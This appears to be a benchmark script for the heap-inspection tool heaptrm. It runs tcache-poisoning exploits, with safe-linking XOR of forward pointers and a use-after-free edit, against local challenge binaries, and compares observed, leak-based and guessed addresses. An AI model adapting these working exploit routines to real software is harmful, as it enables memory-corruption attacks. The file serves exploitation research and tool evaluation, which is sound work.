| |
| """ |
| observe_once_benchmark.py — The right architecture for heaptrm. |
| |
| Not an iterative tool loop. Instead: |
| 1. Observe heap layout once (heaptrm) |
| 2. Compute exploit from observations (deterministic) |
| 3. Execute exploit script against fresh binary |
| |
| Compare: |
| Approach A: observe → compute → exploit (has addresses) |
| Approach B: guess → exploit (no addresses) |
| |
| This is the fair test: does one observation call unlock exploitation |
| that's otherwise impossible? |
| """ |
|
|
| import subprocess |
| import json |
| import struct |
| import os |
| import time |
| from pathlib import Path |
| from dataclasses import dataclass |
|
|
| ROOT = Path(__file__).parent.parent |
| SUITE = ROOT / "cve_tests" / "suite" |
| HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm") |
|
|
|
|
| @dataclass |
| class Result: |
| challenge: str |
| difficulty: str |
| approach: str |
| success: bool |
| info: str |
|
|
|
|
| def observe_heap(binary: str, size_class: int) -> dict: |
| """One heaptrm call: alloc 3, free 2, observe. Returns addresses.""" |
| commands = [ |
| {"action": "send", "data": f"1 0 {size_class}\n"}, |
| {"action": "send", "data": f"1 1 {size_class}\n"}, |
| {"action": "send", "data": f"1 2 {size_class}\n"}, |
| {"action": "send", "data": "4 0\n"}, |
| {"action": "send", "data": "4 1\n"}, |
| {"action": "observe"}, |
| {"action": "quit"}, |
| ] |
|
|
| proc = subprocess.Popen( |
| [HEAPTRM, binary], |
| stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, |
| text=True |
| ) |
|
|
| results = [] |
| for cmd in commands: |
| proc.stdin.write(json.dumps(cmd) + "\n") |
| proc.stdin.flush() |
| line = proc.stdout.readline() |
| if line: |
| results.append(json.loads(line)) |
|
|
| proc.wait(timeout=5) |
|
|
| |
| for r in reversed(results): |
| if r.get("heap") and r["heap"].get("freed", 0) >= 2: |
| chunks = r["heap"]["chunks"] |
| freed = [c for c in chunks if c["state"] == "freed"] |
| allocated = [c for c in chunks if c["state"] == "allocated"] |
| if freed and allocated: |
| return { |
| "freed": [(c["index"], int(c["address"], 16)) for c in freed], |
| "allocated": [(c["index"], int(c["address"], 16)) for c in allocated], |
| "all_chunks": chunks, |
| } |
| return {} |
|
|
|
|
| def exploit_with_observation(binary: str, obs: dict, size_class: int) -> bool: |
| """Given observed addresses, compute and execute tcache poison.""" |
| if not obs.get("freed") or not obs.get("allocated"): |
| return False |
|
|
| |
| freed_sorted = sorted(obs["freed"], key=lambda x: x[1]) |
| alloc_sorted = sorted(obs["allocated"], key=lambda x: x[1]) |
|
|
| chunk1_addr = freed_sorted[-1][1] |
| target_addr = alloc_sorted[-1][1] |
|
|
| |
| xor_key = chunk1_addr >> 12 |
| poisoned_fd = target_addr ^ xor_key |
| fd_hex = struct.pack("<Q", poisoned_fd).hex()[:16] |
|
|
| |
| commands = ( |
| f"1 0 {size_class}\n" |
| f"1 1 {size_class}\n" |
| f"1 2 {size_class}\n" |
| "4 0\n" |
| "4 1\n" |
| f"2 1 {fd_hex}\n" |
| f"1 3 {size_class}\n" |
| f"1 4 {size_class}\n" |
| "2 4 50574e454421210a\n" |
| "3 2\n" |
| "5\n" |
| ) |
|
|
| proc = subprocess.run( |
| [binary], input=commands.encode(), |
| capture_output=True, timeout=5 |
| ) |
|
|
| return b"50574e4544" in proc.stdout |
|
|
|
|
| def exploit_blind(binary: str, size_class: int) -> bool: |
| """No observation. Guess addresses.""" |
| |
| guess_base = 0x555555559000 |
| offsets_to_try = [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600, |
| 0x650, 0x700, 0x750, 0x800, 0x850, 0x900] |
|
|
| for offset in offsets_to_try: |
| chunk1_guess = guess_base + offset + 0x50 |
| target_guess = chunk1_guess + 0x50 |
| xor_key = chunk1_guess >> 12 |
| poisoned = target_guess ^ xor_key |
| fd_hex = struct.pack("<Q", poisoned).hex()[:16] |
|
|
| commands = ( |
| f"1 0 {size_class}\n" |
| f"1 1 {size_class}\n" |
| f"1 2 {size_class}\n" |
| "4 0\n" |
| "4 1\n" |
| f"2 1 {fd_hex}\n" |
| f"1 3 {size_class}\n" |
| f"1 4 {size_class}\n" |
| "2 4 50574e454421210a\n" |
| "3 2\n" |
| "5\n" |
| ) |
|
|
| proc = subprocess.run( |
| [binary], input=commands.encode(), |
| capture_output=True, timeout=5 |
| ) |
|
|
| if b"50574e4544" in proc.stdout: |
| return True |
|
|
| |
| |
|
|
| return False |
|
|
|
|
| def exploit_blind_with_leak(binary: str, size_class: int, config: dict) -> bool: |
| """Blind but uses binary's own leak if available.""" |
| from pwn import process as pwn_process, p64, u64, context |
| context.log_level = "error" |
|
|
| p = pwn_process(binary) |
|
|
| def alloc(slot, sc): |
| p.sendline(f"1 {slot} {sc}".encode()) |
| return p.recvline(timeout=1).strip() |
|
|
| def free_s(slot): |
| p.sendline(f"4 {slot}".encode()) |
| return p.recvline(timeout=1).strip() |
|
|
| def edit(slot, hexdata): |
| p.sendline(f"2 {slot} {hexdata}".encode()) |
| return p.recvline(timeout=1).strip() |
|
|
| def show(slot): |
| p.sendline(f"3 {slot}".encode()) |
| return p.recvline(timeout=1).strip() |
|
|
| try: |
| r0 = alloc(0, size_class) |
| r1 = alloc(1, size_class) |
| r2 = alloc(2, size_class) |
|
|
| |
| addr0 = addr1 = addr2 = None |
| for r, idx in [(r0, 0), (r1, 1), (r2, 2)]: |
| if r and b"0x" in r: |
| try: |
| a = int(r.split(b"0x")[1].split()[0], 16) |
| if idx == 0: addr0 = a |
| elif idx == 1: addr1 = a |
| elif idx == 2: addr2 = a |
| except: |
| pass |
|
|
| free_s(0) |
| free_s(1) |
|
|
| |
| leak = show(1) |
| leaked_fd = None |
| if leak and leak != b"DELETED" and leak != b"ERR" and len(leak) >= 16: |
| try: |
| leaked_fd = int(leak[:16], 16) |
| except: |
| pass |
|
|
| |
| if addr1 and addr2: |
| xor_key = addr1 >> 12 |
| poisoned = addr2 ^ xor_key |
| elif leaked_fd: |
| guess_key = 0x555555559 |
| decrypted = leaked_fd ^ guess_key |
| if 0x555555550000 < decrypted < 0x555555570000: |
| chunk0 = decrypted |
| target = chunk0 + 0xa0 |
| poisoned = target ^ guess_key |
| else: |
| p.close() |
| return False |
| elif addr0: |
| xor_key = (addr0 + 0x50) >> 12 |
| target = addr0 + 0xa0 |
| poisoned = target ^ xor_key |
| else: |
| p.close() |
| return False |
|
|
| edit(1, p64(poisoned).hex()[:16]) |
| alloc(3, size_class) |
| alloc(4, size_class) |
| edit(4, b"PWNED!!".hex()) |
| result = show(2) |
| p.close() |
| return result and b"50574e4544" in result |
|
|
| except: |
| try: p.close() |
| except: pass |
| return False |
|
|
|
|
| def main(): |
| manifest = json.loads((SUITE / "manifest.json").read_text()) |
| TRIALS = 10 |
|
|
| print("=" * 80) |
| print(f"OBSERVE-ONCE BENCHMARK: heaptrm observe → exploit vs blind") |
| print(f"{len(manifest)} challenges × {TRIALS} trials") |
| print("=" * 80) |
|
|
| results = [] |
|
|
| for config in manifest: |
| name = config["name"] |
| binary = str(SUITE / name) |
| if not Path(binary).exists(): |
| continue |
|
|
| sizes = config.get("sizes", [0x40]) |
| sc = 1 |
|
|
| |
| ht_wins = 0 |
| for t in range(TRIALS): |
| obs = observe_heap(binary, sc) |
| if obs and exploit_with_observation(binary, obs, sc): |
| ht_wins += 1 |
|
|
| |
| bl_wins = 0 |
| for t in range(TRIALS): |
| if exploit_blind_with_leak(binary, sc, config): |
| bl_wins += 1 |
|
|
| |
| guess_wins = 0 |
| for t in range(TRIALS): |
| if exploit_blind(binary, sc): |
| guess_wins += 1 |
|
|
| delta_leak = ht_wins - bl_wins |
| delta_blind = ht_wins - guess_wins |
| marker = ">>>" if delta_blind > TRIALS * 0.5 else ">" if delta_blind > 0 else "==" |
|
|
| results.append({ |
| "name": name, "difficulty": config["difficulty"], |
| "ht": ht_wins, "leak": bl_wins, "blind": guess_wins, |
| "uaf_read": config["uaf_read"], "addr_leak": config["addr_leak"], |
| "noise": f"{config['noise_min']}-{config['noise_max']}", |
| }) |
|
|
| print(f" {name} [{config['difficulty']:8s}] " |
| f"heaptrm={ht_wins}/{TRIALS} " |
| f"w/leak={bl_wins}/{TRIALS} " |
| f"blind={guess_wins}/{TRIALS} " |
| f"| leak={config['addr_leak']:7s} uaf={config['uaf_read']} " |
| f"noise={config['noise_min']}-{config['noise_max']} {marker}") |
|
|
| |
| print("\n" + "=" * 80) |
| print("SUMMARY") |
| print("=" * 80) |
| print(f"{'Difficulty':10s} {'heaptrm':>10s} {'w/leak':>10s} {'blind':>10s}") |
| print("-" * 45) |
|
|
| for diff in ["easy", "medium", "hard", "extreme"]: |
| group = [r for r in results if r["difficulty"] == diff] |
| if not group: |
| continue |
| ht = sum(r["ht"] for r in group) / (len(group) * TRIALS) * 100 |
| lk = sum(r["leak"] for r in group) / (len(group) * TRIALS) * 100 |
| bl = sum(r["blind"] for r in group) / (len(group) * TRIALS) * 100 |
| print(f"{diff:10s} {ht:9.0f}% {lk:9.0f}% {bl:9.0f}%") |
|
|
| ht_all = sum(r["ht"] for r in results) / (len(results) * TRIALS) * 100 |
| lk_all = sum(r["leak"] for r in results) / (len(results) * TRIALS) * 100 |
| bl_all = sum(r["blind"] for r in results) / (len(results) * TRIALS) * 100 |
| print(f"{'OVERALL':10s} {ht_all:9.0f}% {lk_all:9.0f}% {bl_all:9.0f}%") |
|
|
| |
| Path("bench").mkdir(exist_ok=True) |
| with open("bench/observe_once_results.json", "w") as f: |
| json.dump(results, f, indent=2) |
| print(f"\nSaved to bench/observe_once_results.json") |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|